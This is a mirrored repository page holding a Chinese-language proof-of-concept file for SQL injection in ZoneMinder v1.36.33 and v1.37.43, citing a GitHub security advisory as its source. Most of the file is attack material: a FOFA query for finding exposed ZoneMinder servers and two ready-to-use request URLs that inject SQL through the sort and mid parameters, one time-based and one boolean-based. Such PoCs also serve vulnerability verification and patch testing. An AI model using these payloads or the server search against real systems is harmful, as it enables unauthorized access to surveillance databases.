admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/ZoneMinder/ZoneMinder系统sort接口存在SQL注入漏洞.md
wy876 fd598ac36b 20250104更新
2025-01-04 14:11:18 +08:00

26 lines
647 B
Markdown
Raw Blame History

# ZoneMinder系统sort接口存在SQL注入漏洞
Zoneminder v1.36.33 和 v1.37.43 受到 SQL 注入漏洞的影响。
## fofa
```javascript
app="ZoneMinder"
```
## poc
```java
http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
```
```java
http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request
```
![image](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031011914.png)
## 漏洞来源
- https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj
Reference in New Issue View Git Blame Copy Permalink